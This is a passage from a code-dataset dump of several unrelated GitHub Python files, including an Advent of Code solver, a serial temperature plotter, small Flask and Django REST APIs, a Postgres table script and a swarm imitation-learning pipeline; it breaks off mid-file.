# # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# Part 1 #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# Part 2 #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\n# load sample data, copied and pasted from the site into list. 
Each list item is one line of input\nmyset = \"\"\" ...#\n .#..\n #...\n ....\n...#.......#\n........#...\n..#....#....\n..........#.\n ...#....\n .....#..\n .#......\n ......#.\n\n10R5L5R10L4R5L5\"\"\".splitlines()\n\n# once the test data provides the right answer: replace test data with data from the puzzle input\nmyset = get_data(day=22, year=2022).splitlines()\nstarttime = time()\n# for i,d in enumerate(myset):\n# print(f'{i}: {d}')\n\nE = 0\nS = 1\nW = 2\nN = 3\nwalls = set()\npaths = set()\ncurpos = ()\ncurdir = E\ninst = ''\nmoves = []\ndirs = {\n E: {\n 'R': S,\n 'L': N,\n },\n S: {\n 'R': W,\n 'L': E,\n },\n W: {\n 'R': N,\n 'L': S,\n },\n N: {\n 'R': E,\n 'L': W,\n },\n}\n\nfor i,y in enumerate(myset):\n if y == '':\n inst = myset[i+1]\n break\n for j,x in enumerate(y):\n if curpos == () and i == 0 and x == '.':\n curpos = (j+1,i+1)\n if x == '.':\n paths.add((j+1,i+1))\n elif x == '#':\n walls.add((j+1,i+1))\n# print(curpos)\n# print('-----------------------------')\n# print(walls)\n# print('-----------------------------')\n# print(paths)\n# print('-----------------------------')\n# print(inst)\n\ntemp_move = ''\nwhile inst:\n if inst[0].isnumeric():\n temp_move += inst[0]\n inst = inst[1:]\n else:\n moves.append(int(temp_move))\n temp_move = ''\n moves.append(inst[0])\n inst = inst[1:]\nif len(temp_move) > 0 and temp_move.isnumeric():\n moves.append(int(temp_move))\ndel temp_move\ndel inst\n\n# pprint(dirs)\n\n# print(moves)\n\nfor x in moves:\n if type(x) == int:\n # print(f'try to move {x} spaces.')\n # print(f'from: {curpos}')\n # I know there is a better way to determine direction, but..... I'm lazy\n if curdir == E:\n d = (1,0)\n elif curdir == S:\n d = (0,1)\n elif curdir == W:\n d = (-1,0)\n elif curdir == N:\n d = (0,-1)\n while(x):\n nextpos = (curpos[0] + d[0],curpos[1] + d[1])\n if nextpos in walls:\n break\n elif nextpos in paths:\n curpos = nextpos\n x-=1\n else:\n #wrap\n if curdir == E: #find the space on the left side of the board\n # again, I know there is a better way.....\n minx = 0\n for z in walls.union(paths):\n if z[1] == curpos[1] and (z[0] < minx or minx == 0):\n minx = z[0]\n nextpos = (minx, curpos[1])\n elif curdir == S: #find the space on the left side of the board\n # again, I know there is a better way.....\n miny = 0\n for z in walls.union(paths):\n if z[0] == curpos[0] and (z[1] < miny or miny == 0):\n miny = z[1]\n nextpos = (curpos[0], miny)\n elif curdir == W: #find the space on the left side of the board\n # again, I know there is a better way.....\n maxx = 0\n for z in walls.union(paths):\n if z[1] == curpos[1] and z[0] > maxx:\n maxx = z[0]\n nextpos = (maxx, curpos[1])\n elif curdir == N: #find the space on the left side of the board\n # again, I know there is a better way.....\n maxy = 0\n for z in walls.union(paths):\n if z[0] == curpos[0] and z[1] > maxy:\n maxy = z[1]\n nextpos = (curpos[0], maxy)\n if nextpos in walls:\n break\n elif nextpos in paths:\n curpos = nextpos\n x-=1\n # print(f'to: {curpos}')\n else:\n # print(f'curdir is {curdir}, turn {x} to {dirs[curdir][x]}.')\n curdir = dirs[curdir][x]\n\n# print('-------------------------------')\n# print(f'Current Position: {curpos}, facing {curdir}.')\n\np1ans = (curpos[1] * 1000) + (4 * curpos[0]) + curdir\n\nprint(f'Part 1 Answer is: {p1ans}')\nprint(time() - 
starttime)\n\n","repo_name":"azmcnutt/AOC-Python","sub_path":"2022/Day22.py","file_name":"Day22.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31612960108","text":"import serial, os, threading, sys, time\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\n#Serial takes these two parameters: serial device and baudrate\r\nser = serial.Serial('COM5', 9600)\r\ncurrent = []\r\nfig = plt.figure() \r\nax = fig.add_subplot(111)\r\nax.set_ylabel('Temp')\r\n\r\n\r\n\r\ndef animate(i, current, ser):\r\n global max,min\r\n if ser.in_waiting:\r\n os.system(\"cls\")\r\n data = ser.readline()\r\n print(\"Temperature logger\")\r\n print(\"^^^^^^^^^^^^^^^^^^\")\r\n print(data.decode('utf'))\r\n print(\"Display mode: \" + get_mode(mode))\r\n input_list = data.split()\r\n current.append(float(input_list[1]))\r\n max = float(input_list[3])\r\n min = float(input_list[5])\r\n \r\n \r\n ax.clear() # clear the plot before drawing new data\r\n ax.plot(current)\r\n ax.set_ylim(min-5, max+5)\r\n ax.set_xlim(len(current)-30, len(current)+30)\r\n ax.set_title('Max = ' + str(max) + ' Min = ' + str(min))\r\n \r\n\r\n\r\n\r\ndef read_input():\r\n global mode\r\n mode = '0'\r\n while True:\r\n mode = input(\"\") # read input from the terminal\r\n ser.write(mode.encode('utf'))\r\n sys.stdout.write('Entering ' + str(get_mode(mode)) + ' mode') # write output to the terminal\r\n\r\ndef get_mode(z):\r\n if z=='1':\r\n return ' (1) max '\r\n elif z=='2':\r\n return ' (2) min'\r\n else:\r\n return 'default'\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n# main -------------------------------------------------------------------------------------------------------------------------\r\n\r\n# create a new thread to run the read_input function\r\ninput_thread = threading.Thread(target=read_input)\r\ninput_thread.daemon = True\r\ninput_thread.start()\r\n\r\n\r\n\r\nwhile not ser.in_waiting:\r\n pass\r\n\r\n \r\nani = animation.FuncAnimation(fig, animate, frames=60, fargs=(current, ser), interval=500) \r\nplt.show()\r\n","repo_name":"Hunmbal/Temperature-Monitoring-system","sub_path":"Python - VS.code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21300812905","text":"# Singly-linked lists are already defined with this interface:\nclass ListNode(object):\n def __init__(self, x):\n self.value = x\n self.next = None\n\n\ndef reverse(head):\n n = head\n r = None\n temp = None\n\n while n:\n # Move forward\n temp = n\n n = n.next\n\n # Join\n temp.next = r\n r = temp\n\n return temp\n\n\ndef solution(head):\n ptr = head\n count = 0\n while ptr:\n ptr = ptr.next\n count += 1\n\n if count < 2:\n return True\n mid = (count - 1) // 2\n\n ptr = head\n while mid:\n ptr = ptr.next\n mid -= 1\n\n ptr1 = reverse(ptr.next)\n ptr = head\n while ptr1:\n if ptr.value != ptr1.value:\n return False\n ptr = ptr.next\n ptr1 = ptr1.next\n\n return True\n","repo_name":"rhoitjadhav/competitive-programming-practice","sub_path":"codesignal/archive/interview-practice/isListPalindrome .py","file_name":"isListPalindrome .py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18219272562","text":"from django.test import TestCase\n\nfrom apps.student.services.applicationuserservice import 
ApplicationUserService\nfrom apps.student.queries.applicationuserquery import ApplicationUserQuery\nfrom apps.student.models.numberingmaster import NumberingMaster\nfrom apps.student.models.masterdata import MasterData\n\n\nclass ApplicationUserServiceTestCase(TestCase):\n\n def setUp(self):\n NumberingMaster.objects.create(\n code='01', initial='U', value=1, comment='')\n NumberingMaster.objects.create(\n code='02', initial='R', value=1, comment='')\n MasterData.objects.create(\n code=\"002\",\n sub_code=\"01\",\n value='active',\n sub_value='sub_value',\n comment='')\n MasterData.objects.create(\n code=\"002\",\n sub_code=\"02\",\n value='stop',\n sub_value='sub_value',\n comment='')\n\n def test(self):\n\n user_id = \"\"\n email = \"email@example.com\"\n first_name = \"first_name\"\n last_name = \"last_name\"\n full_name = \"full_name\"\n authority = \"02\"\n status = \"01\"\n comment = \"comment\"\n login_user_id = \"U0000\"\n\n ApplicationUserService().save_user(\n user_id,\n email,\n first_name,\n last_name,\n full_name,\n authority,\n status,\n comment,\n login_user_id)\n\n user_list = ApplicationUserQuery().get_active_users()\n user = user_list[0]\n\n self.assertEqual(user.email, \"email@example.com\")\n self.assertEqual(user.first_name, \"first_name\")\n self.assertEqual(user.last_name, \"last_name\")\n self.assertEqual(user.full_name, \"full_name\")\n self.assertEqual(user.authority, \"02\")\n self.assertEqual(user.status, \"01\")\n self.assertEqual(user.comment, \"comment\")\n self.assertEqual(user.create_user_id, \"U0000\")\n self.assertEqual(user.update_user_id, \"U0000\")\n\n user_id = user.user_id\n email = \"email3@example.com\"\n first_name = \"first_name3\"\n last_name = \"last_name3\"\n full_name = \"full_name3\"\n authority = \"03\"\n status = \"02\"\n comment = \"comment3\"\n login_user_id = \"U0003\"\n\n ApplicationUserService().save_user(\n user_id,\n email,\n first_name,\n last_name,\n full_name,\n authority,\n status,\n comment,\n login_user_id)\n\n result = ApplicationUserQuery().get_user(user_id)\n\n self.assertEqual(result.email, \"email3@example.com\")\n self.assertEqual(result.first_name, \"first_name3\")\n self.assertEqual(result.last_name, \"last_name3\")\n self.assertEqual(result.full_name, \"full_name3\")\n self.assertEqual(result.authority, \"03\")\n self.assertEqual(result.status, \"02\")\n self.assertEqual(result.comment, \"comment3\")\n self.assertEqual(result.create_user_id, \"U0000\")\n self.assertEqual(result.update_user_id, \"U0003\")\n\n ApplicationUserService().delete_user(user_id)\n\n deleted = ApplicationUserQuery().get_user(user_id)\n\n self.assertEqual(deleted, None)\n\n","repo_name":"TsJazz27Sumin/nakamuratamara","sub_path":"songcycle/apps/student/tests/services/test_applicationuserservice.py","file_name":"test_applicationuserservice.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7922662813","text":"from flask import Flask\nfrom flask_restful import Resource, Api, reqparse\nimport pandas as pd\nimport ast\napp = Flask(__name__)\napi = Api(app)\n\n\nclass Users(Resource):\n def get(self):\n data = pd.read_csv('users.csv') # read CSV\n data = data.to_dict() \n return {'data': data}, 200 \n\n def post(self):\n parser = reqparse.RequestParser() # initialize\n \n parser.add_argument('A', required=True) # add args\n parser.add_argument('B', required=True)\n parser.add_argument('C', required=True)\n \n args = parser.parse_args() # parse 
arguments to dictionary\n \n # create new dataframe containing new values\n new_data = pd.DataFrame({\n 'A': args['A'],\n 'B': args['B'],\n 'C': args['C'],\n })\n # read our CSV\n data = pd.read_csv('users.csv')\n\n if args['userId'] in list(data['userId']):\n return {\n 'message': f\"'{args['userId']}' already exists.\"\n }, 401\n else:\n # create new dataframe containing new values\n new_data = pd.DataFrame({\n 'userId': args['userId'],\n 'name': args['name'],\n 'city': args['city'],\n 'locations': [[]]\n })\n # add the newly provided values\n data = data.append(new_data, ignore_index=True)\n data.to_csv('users.csv', index=False) # save back to CSV\n return {'data': data.to_dict()}, 200 # return data with 200 OK\n\n\napi.add_resource(Users, '/users') \n\nif __name__ == '__main__':\n app.run()","repo_name":"suraj-raj-3000/Prospecta_api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14723784432","text":"\"\"\"Mini-project 2 task 1 subtask e by Sen Ivan\"\"\"\nimport os\ndef find_same(path1:str, path2:str, res_path:str) -> None:\n \"\"\"\n Find same lines in two files and write them to result file.\n >>> import tempfile\n >>> with tempfile.NamedTemporaryFile(mode='w+', delete=False) as f:\n ... _ = f.write('a\\\\nb\\\\na\\\\n')\n >>> with tempfile.NamedTemporaryFile(mode='w+', delete=False) as f2:\n ... _ = f2.write('a\\\\nb\\\\n')\n >>> with tempfile.NamedTemporaryFile(mode='w+', delete=False) as res:\n ... find_same(f.name, f2.name, res.name)\n >>> with open(res.name, 'r') as res:\n ... print(res.read())\n a\n b\n \"\"\"\n if not os.path.isfile(res_path):\n raise ValueError('Result file does not exist or is directory')\n if not (os.path.isfile(path1) and os.path.isfile(path2)):\n raise ValueError('One of the files does not exist or is directory')\n with open(path1, 'r', encoding='utf-8') as file1, open(path2, 'r', encoding=\"utf-8\")\\\n as file2, open(res_path, 'w+', encoding=\"utf-8\") as res_file:\n lines1 = file1.readlines()\n lines2 = file2.readlines()\n for line1 in lines1:\n if line1 in lines2 and line1 not in res_file:\n res_file.write(line1)\nif __name__ == \"__main__\":\n # import doctest\n # print(doctest.testmod())\n import argparse\n parser = argparse.ArgumentParser(\n prog='task 1 subtask e',\n description='find same lines in files'\n )\n\n parser.add_argument('path1', type=str, help='first file to compare')\n parser.add_argument('path2', type=str, help='second file to compare')\n parser.add_argument('dst', type=str, help='file to write results to')\n\n args = parser.parse_args()\n find_same(args.path1, args.path2, args.dst)\n","repo_name":"senivan/mini-project-2","sub_path":"project2_task1_e.py","file_name":"project2_task1_e.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69794423626","text":"# Problem Statement: https://leetcode.com/problems/partition-labels/\n\nclass Solution:\n def partitionLabels(self, s: str) -> List[int]:\n \n last = {s[i]: i for i in range(len(s))} # last appearance of the letter\n i, ans = 0, []\n while i < len(s):\n end, j = last[s[i]], i + 1\n while j < end: # validation of the part [i, end]\n if last[s[j]] > end:\n end = last[s[j]] # extend the part\n j += 1\n \n ans.append(end - i + 1)\n i = end + 1\n \n return ans\n \n'''\nSince each letter can appear only in one part, we cannot form a part 
shorter than the \nindex of the last appearance of a letter subtracted by an index of the first appearance. \nFor example here (absfab) the lengths of the first part are limited by the positions of the letter a. \nSo it's important to know at what index each letter appears in the string last time. \nWe can create a hash map and fill it with the last indexes for letters.\n\nAlso, we have to validate a candidate part. \nFor the same example (absfab) we see that letter a cannot form a border for the first part \nbecause of a nasty letter b inside. So we need to expand the range of the initial part.\n'''","repo_name":"yashitanamdeo/leetcode","sub_path":"Medium/763. Partition Labels.py","file_name":"763. Partition Labels.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"7141750517","text":"import psycopg2\nfrom decouple import config\n\n# connect to database\nconn = psycopg2.connect(\n host=config('POSTGRES_HOST'),\n port=\"5432\",\n database=\"13f_2023\",\n user=config('POSTGRES_USER'),\n password=config('POSTGRES_PASSWORD')\n)\n# create a cursor\ncur = conn.cursor()\ndef create_tables():\n # create a cursor\n cur = conn.cursor()\n\n # create tables\n create_table_commands = (\n \"\"\"\n CREATE TABLE filings (\n filing_id varchar(255) PRIMARY KEY,\n cik int,\n filer_name varchar(255),\n period_of_report date\n )\n \"\"\",\n \"\"\"\n CREATE TABLE holdings (\n filing_id varchar(255),\n name_of_issuer varchar(255),\n cusip varchar(255),\n title_of_class varchar(255),\n value bigint,\n shares int,\n put_call varchar(255),\n CONSTRAINT fk_holdings_filings\n FOREIGN KEY (filing_id) REFERENCES filings(filing_id)\n )\n \"\"\"\n\n # ,\"\"\"\n # CREATE TABLE holding_infos (\n # cusip varchar(255),\n # security_name varchar(255),\n # ticker varchar(50),\n # exchange_code varchar(10),\n # security_type varchar(50)\n # )\n # \"\"\"\n )\n\n # create table one by one\n for command in create_table_commands:\n cur.execute(command)\n\n # close cursor\n cur.close()\n\n # make the changes to the database persistent\n conn.commit()\n\ncreate_tables()\n","repo_name":"AleksKostadinov/Investment_using_AI","sub_path":"analizing13f/create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3712500685","text":"#!/usr/bin/env python3\n\nimport sys, argparse, functools\n\ndef split_itv(a,b):\n h = b//2 + (b % 2)\n return [(a,h),(a+h,b-h)]\n\ndef partition_two(cutlen,m,n):\n stack = [((0,m),(0,n))]\n while len(stack) > 0:\n ((i,j),(k,l)) = stack.pop()\n if j <= cutlen and l <= cutlen:\n yield ((i,j),(k,l))\n else:\n if j < l:\n for itv in split_itv(k,l):\n stack.append(((i,j),itv))\n else:\n for itv in split_itv(i,j):\n stack.append((itv,(k,l)))\n\ndef partition_interval(cutlen,m):\n for i in range(0,m,cutlen):\n if i + cutlen <= m:\n yield (i,cutlen)\n else:\n if m > i:\n yield (i,m - i)\n\ndef partition_self(cutlen,m):\n ps = list(partition_interval(cutlen,m))\n for p in ps:\n yield (p,None)\n for i in range(len(ps)):\n for j in range(i+1,len(ps)):\n yield (ps[i],ps[j])\n\ndef antidiagonal(itv):\n if itv[1] is None:\n return 2 * itv[0][0]\n else:\n return itv[0][0] + itv[1][0]\n\ndef antidiagonal_cmp(l,r):\n if antidiagonal(l) < antidiagonal(r):\n return -1\n if antidiagonal(l) > antidiagonal(r):\n return +1\n if l[0][0] < r[0][0]:\n return -1\n if l[0][0] > r[0][0]:\n return 
1\n assert false\n\ndef partition(cutlen,m,n):\n l = list()\n if n == 0:\n for v in partition_self(cutlen,m):\n l.append(v)\n else:\n for v in partition_two(cutlen,m,n):\n l.append(v)\n return sorted(l,key=functools.cmp_to_key(antidiagonal_cmp))\n\ndef pairs_count(covered,p):\n s0 = p[0][0]\n l0 = p[0][1]\n end0 = s0 + l0\n if p[1] is None:\n if covered is not None:\n for i in range(s0,end0-1):\n for j in range(i+1,end0):\n assert covered[i][j] == 0\n covered[i][j] = 1\n return (l0 * (l0-1))//2\n else:\n s1 = p[1][0]\n l1 = p[1][1]\n end1 = s1 + l1\n if covered is not None:\n for i in range(s0,end0):\n for j in range(s1,end1):\n assert covered[i][j] == 0\n covered[i][j] = 1\n return l0 * l1\n\ndef parse_arguments(argv):\n p = argparse.ArgumentParser(description='divide matrix into submatrices')\n p.add_argument('-d','--debug',action='store_true',default=False,\n help=('keep track of covered intervals (very slow) for '\n 'debugging'))\n p.add_argument('cutlen',type=int,default=None,help='specify cutlen')\n p.add_argument('rows',type=int,default=None,help='specify number of rows')\n p.add_argument('cols',type=int,default=None,help='specify number of columns')\n return p.parse_args(argv)\n\nargs = parse_arguments(sys.argv[1:])\n\ncollect = set()\nnum_pairs = 0\ncovered = None\nif args.debug:\n import numpy as np\n if args.cols == 0:\n covered = np.zeros((args.rows,args.rows),dtype=np.uint8)\n else:\n covered = np.zeros((args.rows,args.cols),dtype=np.uint8)\n\nif args.cols == 0:\n expected = (args.rows * (args.rows-1))//2\nelse:\n expected = args.rows * args.cols\n\nfor itv in partition(args.cutlen,args.rows,args.cols):\n assert not itv in collect\n collect.add(itv)\n pc = pairs_count(covered,itv)\n num_pairs += pc\n print('{}\\t{}\\t{}'.format(itv,antidiagonal(itv),pc))\n\nprint('# number of parts\\t{}'.format(len(collect)))\nprint('# number of pairs\\t{}'.format(num_pairs))\nassert not args.debug or num_pairs == np.sum(covered)\nassert num_pairs == expected, ('num_pairs = {} != {} = expected'\n .format(num_pairs,expected))\n","repo_name":"stefan-kurtz/gttl","sub_path":"testsuite/matrix_partition.py","file_name":"matrix_partition.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"4848070904","text":"# even this will become another function eventually\nfrom pipeline_tools.learning import learnMotionConstraints, learnNeighborRadius, learnGainsLinearRegression, learnGainsNonLinearOptimization\nfrom pipeline_tools.prevalidation import plotNeighborRadius, testTrueNeighborRadius, testTrueGainsLinear, testTrueGainsNonLinear\nfrom sim_tools import sim\nfrom sim_tools import media_export as export\nfrom imitation_tools import data_prep\nfrom features.features import *\nfrom models.featureCombo import FeatureCombo as fc\nfrom models.featureComboEnv import FeatureComboEnv as fcE\n\nfrom tqdm import tqdm\nimport numpy as np\nimport copy\nimport os\n\nparams = sim.SimParams(\n num_agents=40,\n dt=0.05,\n overall_time=30,\n enclosure_size=20,\n init_pos_max=None, # if None, then defaults to enclosure_size\n agent_max_vel=7,\n init_vel_max=None,\n agent_max_accel=np.inf,\n agent_max_turn_rate=np.inf,\n neighbor_radius=5,\n periodic_boundary=False\n)\n\nif __name__ == '__main__':\n\n # INITIAL GENERATION\n orig_soc_features = [\n Cohesion(),\n Alignment(),\n SeparationInv2(),\n SteerToAvoid(params.neighbor_radius/4,params.neighbor_radius),\n Rotation(),\n ]\n\n orig_env_features = [\n Inertia(),\n ]\n\n\n 
true_gains = np.array([3, 0, 1,1,1,0])\n orig_controller = fcE(true_gains[:len(orig_soc_features)],orig_soc_features,true_gains[len(orig_soc_features):], orig_env_features)\n orig_controllers = [copy.deepcopy(orig_controller)\n for i in range(params.num_agents)]\n\n print(\"Run and export initial sim\")\n initSimPos, initSimVels = sim.runSim(\n orig_controllers, params, progress_bar=True)\n\n if not os.path.exists(\"Output/Full_Pipeline_Output_Artificial\"):\n os.makedirs(\"Output/Full_Pipeline_Output_Artificial\")\n\n print(\"Run Training Sims\")\n # eventually would like to eliminate/reduce this step, and learn from primarily one big sim\n trainingParams = copy.deepcopy(params)\n trainingParams.num_agents = 10\n trainingParams.enclosure_size = 10\n trainingParams.init_vel_max = 1\n trainingParams.overall_time = 4\n num_sims = 100\n \n posVelSlices = []\n # posVelSlices = data_prep.toPosVelSlices(initSimPos,params)\n for i in tqdm(range(num_sims)):\n trainPositions, trainVels = sim.runSim(\n orig_controllers, trainingParams, progress_bar=False)\n\n # apply noise to position data\n # noise_percent = 0.001\n # for pos in trainPositions:\n # # 0.6 to account for stdev value, so most things are within bounds\n # # maybe should do the noise based on current vel\n # noise = 0.6*noise_percent*params.agent_max_vel*np.random.normal(0,1,size=(2))*params.dt\n # pos+=noise\n\n posVelSlices.extend(data_prep.toPosVelSlices(\n trainPositions, trainingParams))\n\n social_features = {\n \"coh\": Cohesion(),\n \"align\": Alignment(),\n \"sep\": SeparationInv2(),\n \"steer\":SteerToAvoid(params.neighbor_radius/4,params.neighbor_radius),\n \"rot\":Rotation()\n }\n\n env_features = {\n \"inertia\": Inertia(),\n }\n\n # VALIDATION\n# \n # realFeatureSlices = data_prep.toFeatureSlices(\n # posVelSlices, social_features,env_features, trainingParams)\n # print(\"Neighbor radius true loss\", testTrueNeighborRadius(\n # posVelSlices, trainingParams, social_features,env_features))\n # print(\"Gain true loss for linear\", testTrueGainsLinear(\n # true_gains, realFeatureSlices, trainingParams))\n # print(\"Gain true loss for nonlinear\", testTrueGainsNonLinear(\n # true_gains, realFeatureSlices, trainingParams))\n\n # plotNeighborRadius(posVelSlices, trainingParams, social_features,env_features)\n\n # LEARNING\n # being very explicit here, only transferring from original exactly what we will transfer\n # eventually should split params class itself, but that's for later\n learnedParams = sim.SimParams()\n learnedParams.dt = trainingParams.dt\n learnedParams.num_agents = trainingParams.num_agents\n learnedParams.enclosure_size = trainingParams.enclosure_size\n\n learnedMCs = learnMotionConstraints(posVelSlices, learnedParams)\n\n print(\"Learned MCs\", learnedMCs)\n learnedParams.agent_max_vel = learnedMCs[\"max_vel\"]\n # other two aren't learned properly yet\n\n radius = learnNeighborRadius(\n posVelSlices, learnedParams, social_features,env_features)\n print(\"Learned Radius\", radius)\n learnedParams.neighbor_radius = radius\n\n featureSlices = data_prep.toFeatureSlices(\n posVelSlices, social_features,env_features, learnedParams)\n\n linear_gains = learnGainsLinearRegression(\n featureSlices, learnedParams, social_features,env_features)\n print(\"Linear gains\", linear_gains)\n\n improved_gains = learnGainsNonLinearOptimization(\n featureSlices, learnedParams, guess=linear_gains, maxSample=5000)\n print(\"Improved Gains\", improved_gains)\n\n # RUN OUTPUT SIMS\n # make numbers line up\n learnedParams.num_agents = 
params.num_agents\n learnedParams.overall_time = params.overall_time\n learnedParams.enclosure_size = params.enclosure_size\n\n soc_gains = improved_gains[:len(social_features)]\n env_gains = improved_gains[len(social_features):]\n imitation_controller = fcE(soc_gains, list(\n social_features.values()), env_gains, list(env_features.values()))\n imitated_controllers = [copy.deepcopy(\n imitation_controller) for i in range(learnedParams.num_agents)]\n for controller in imitated_controllers:\n controller.setColor(\"red\")\n\n print(\"Running Imitation Sim\")\n imitSimPos, imitSimVels = sim.runSim(imitated_controllers, learnedParams,\n initial_positions=initSimPos[0], initial_velocities=initSimVels[0], progress_bar=True)\n # hybrid --no good way to show different radiuses right now, so not showing yet\n # mix_factor = 0.5\n # num_orig = (0.5*params.num_agents)\n # hybrid_controllers = orig_controllers[0:]\n\n # EXPORT TO FILES\n print(\"Exporting to files\")\n export.export(export.ExportType.GIF, \"Output/Full_Pipeline_Output/Initial\",\n initSimPos, initSimVels, params, progress_bar=True)\n export.export(export.ExportType.GIF, \"Output/Full_Pipeline_Output/Imitated\", imitSimPos,\n imitSimVels, learnedParams, progress_bar=True, controllers=imitated_controllers)\n","repo_name":"wvu-robotics/REU_MatlabSim","sub_path":"matlab/REU_2022/Topic_1_ Imitating_Swarms/SwarmSimClassSeparationPy/full_pipeline_artificial.py","file_name":"full_pipeline_artificial.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"37739413758","text":"\"\"\"\nThe Views File which contains the views that will execute from the urls endpoints by the RestAPI structure. (see in `mainapp/urls.py`)\n-------------\n\nThe decorators in each view function e.g. 
@api_view([\"GET\"]),\nis for the view function to accept only specific HTTP Requests, or to provide an Authentication barrier.\n\n\"\"\"\n\n# Custom Imports\nfrom mainapp.models import Message, MessageUser # Custom Models\nfrom mainapp.serializers import MessageSerializer # Custom Serializers\n\n#Django Imports\nfrom django.core.exceptions import ObjectDoesNotExist # Exception if the object is not exist\nfrom django.db import IntegrityError # Exception if the username is already taken\n\n# Django Rest Framework Imports\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view,permission_classes # For DjangorestFramework Decorators\nfrom rest_framework import status # For HTTP statuses\nfrom rest_framework.permissions import IsAuthenticated,AllowAny # For User Authentication\n\n\n@api_view([\"GET\"])\n@permission_classes([IsAuthenticated])\ndef get_all_messages(request, *args, **kwargs):\n '''\n Returns all Messages of the logged-in User.\n\n Parameters:\n request (HTTP Request) : contains various HTTP content \n *args (possible non-keyword arguments)\n *kwargs (possible keyword arguments) : contains the username in the endpoint (for example: /user1/messages) user1 is the username)\n\n Returns:\n Json Response (Json): if valid - returns the messages, if not - returns Http-Error Response\n '''\n\n username = kwargs[\"username\"]\n\n # Check if the user is trying to read other user messages:\n if request.user.username != username:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n \n #try to fetch the User Object:\n try:\n user_object = MessageUser.objects.get(username=username)\n except MessageUser.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND) \n except Exception as e:\n return Response(e)\n \n # Getting the messages of the user - and serialized them into JSON data that can be sent as a response\n all_messages = MessageSerializer(user_object.messages.all(),many=True)\n\n return Response(all_messages.data)\n\n\n@api_view([\"GET\",\"DELETE\"])\n@permission_classes([IsAuthenticated])\ndef message(request, *args, **kwargs):\n '''\n Returns specific Message of the logged-in User.\n\n Parameters:\n request (HTTP Request) : contains various HTTP content \n *args (possible non-keyword arguments)\n *kwargs (possible keyword arguments) : contains the username and the ID of the message in the endpoint (for example: /user1/messages/3) user1 is the username and 3 is the message ID)\n\n Returns:\n Json Response (Json): if valid - returns the message, if not - returns Http-Error Response\n '''\n\n id = kwargs['id']\n username = kwargs[\"username\"]\n\n if request.user.username != username:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n if request.method=='GET': \n \n try:\n user_object = MessageUser.objects.get(username=username)\n message = user_object.messages.all()[int(id)-1] # minus 1, Because the QuerySet using from-0 counting \n message_serializer = MessageSerializer(message)\n\n message.is_read = True\n message.save() # update the 'is_read' attribute\n\n return Response(message_serializer.data)\n\n except ObjectDoesNotExist:\n return Response(status=404)\n\n except IndexError as i:\n return Response(data={\"The message not exist - message ID Out of Range\":str(i)})\n except Exception as e:\n return Response(e)\n\n elif request.method=='DELETE': \n \n try:\n user_object = MessageUser.objects.get(username=username)\n message = user_object.messages.all()[int(id)-1]\n user_object.messages.remove(message)\n \n return 
Response(status=200)\n\n except ObjectDoesNotExist:\n return Response(status=404)\n\n except Exception as e:\n return Response(e)\n\n\n@api_view([\"POST\"])\n@permission_classes([IsAuthenticated])\ndef write_message(request, *args, **kwargs):\n '''\n Send a New Message for the logged-in User.\n\n The API works with JSON data. Example:\n\n {\n \"sender\": \"your-user-name\",\n \"receiver\": \"user-name\" ,\n \"message_txt\": \"Message-Text\",\n \"subject\": \"Message-Subject\"\n }\n\n Parameters:\n request (HTTP Request) : contains various HTTP content, and in particular - 'data' which contains the New Message data to be sent.\n *args (possible non-keyword arguments)\n *kwargs (possible keyword arguments) : contains the username in the endpoint (for example: /user1/messages) user1 is the username)\n\n Returns:\n Json Response (Json): if valid - returns the New Message that has been sent with a HTTP_201_CREATED status, if not - returns Http-Error Response\n '''\n\n receiver_name = request.data['receiver']\n sender_name = request.data['sender']\n message_dict = request.data \n\n if request.user.username != sender_name: \n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n # Replace the usernames strings to IDs (user's primary key for a valid de-Serialization )\n request.data['receiver'] = MessageUser.objects.get(username=receiver_name).id\n request.data['sender'] = MessageUser.objects.get(username=sender_name).id\n\n #de-serialize the message that the user sent(in JSNO format) to Python friendly data - in order to save it as a Message Model.\n message_serializer = MessageSerializer(data = request.data)\n \n if message_serializer.is_valid():\n # gets the Users Objects\n receiver_user_object = MessageUser.objects.get(username=receiver_name)\n sender_user_object = 